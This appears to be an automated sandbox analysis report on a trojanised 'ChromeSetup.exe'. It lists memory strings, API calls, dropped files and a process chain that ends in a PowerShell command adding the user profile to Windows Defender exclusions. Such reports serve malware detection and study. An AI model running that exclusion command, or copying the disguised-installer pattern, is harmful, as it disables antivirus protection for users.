Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit#
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager;
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xalan
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xslt
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities8
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespacesv
Source: javaw.exe, 00000002.00000002.3385302759.000000000A5FD000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078204806.00000000157D4000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interning
Source: javaw.exe, 00000002.00000003.1078204806.00000000157D4000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interningfeature
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/lexical-handler.
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/xml-string?
Source: powershell.exe, 00000005.00000002.1091230564.0000000004951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBAr
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: svchost.exe, 00000007.00000003.1203071644.000001C7D6B43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000007.00000003.1203071644.000001C7D6B10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1095173503.0000000007001000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F9

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_004044E8 lstrlenW,wsprintfW,SetDlgItemTextW,GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044E8

System Summary

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

0_2_004038AF

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_0040737E	0_2_0040737E
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00406EFE	0_2_00406EFE
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_004079A2	0_2_004079A2
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_004049A8	0_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Code function: 1_2_00405D30	1_2_00405D30
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Code function: 1_2_004013B0	1_2_004013B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00EFB4D0	5_2_00EFB4D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00EFB4A8	5_2_00EFB4A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_083A3AA8	5_2_083A3AA8

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge-32.dll 532D049E0D7A265754902C23B0F150D665A78A3D6FE09AD51C9BE8C29D574A3D

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: String function: 004062CF appears 57 times
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Code function: String function: 00406E10 appears 37 times

Uses 32bit PE files

Source: ChromeSetup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal63.evad.winEXE@13/217@0/2

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

Code function: 1_2_00401ED0 GetLastError,puts,ShellExecuteA,printf,fclose,MessageBoxA,FormatMessageA,strlen,strcat,LocalFree,fprintf,fprintf,fprintf,

1_2_00401ED0

Source: C:\Users\user\Desktop\ChromeSetup.exe

0_2_004044E8

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00402535 CoCreateInstance,

0_2_00402535

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

Code function: 1_2_00404740 FindResourceExA,LoadResource,LockResource,fprintf,FindResourceExA,LoadResource,LockResource,fprintf,strchr,strlen,strcpy,FindResourceExA,LoadResource,LockResource,fprintf,strchr,strlen,strcpy,strncpy,strlen,strcat,strncpy,strlen,strcat,FindResourceExA,LoadResource,LockResource,atoi,SetLastError,SetLastError,SetLastError,strcpy,fprintf,FindResourceExA,LoadResource,LockResource,atoi,strcpy,fprintf,fprintf,SetLastError,SetLastError,fprintf,

1_2_00404740

Source: C:\Users\user\Desktop\ChromeSetup.exe

File created: C:\Users\user\AppData\Local\RoadSpecialized-Launcher

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03

Source: C:\Users\user\Desktop\ChromeSetup.exe

File created: C:\Users\user\AppData\Local\Temp\nsmFBF2.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\97d84ae1f15f1791152b8995b44f6da3.bat

Source: ChromeSetup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ChromeSetup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ChromeSetup.exe	ReversingLabs: Detection: 47%
Source: ChromeSetup.exe	Virustotal: Detection: 40%

Source: ChromeSetup.exe	String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\lib\security
Source: RoadSpecialized-Launcher.exe	String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00
Source: RoadSpecialized-Launcher.exe	String found in binary or memory: -Dfile.encoding=UTF-8 -classpath "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe" org.develnext.jphp.ext.javafx.FXLauncher
Source: RoadSpecialized-Launcher.exe	String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher
Source: RoadSpecialized-Launcher.exe	String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

Source: C:\Users\user\Desktop\ChromeSetup.exe

File read: C:\Users\user\Desktop\ChromeSetup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ChromeSetup.exe "C:\Users\user\Desktop\ChromeSetup.exe"
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe" org.develnext.jphp.ext.javafx.FXLauncher
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\97d84ae1f15f1791152b8995b44f6da3.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe" org.develnext.jphp.ext.javafx.FXLauncher	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\97d84ae1f15f1791152b8995b44f6da3.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE	Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: aclayers.dll	Jump to behavior
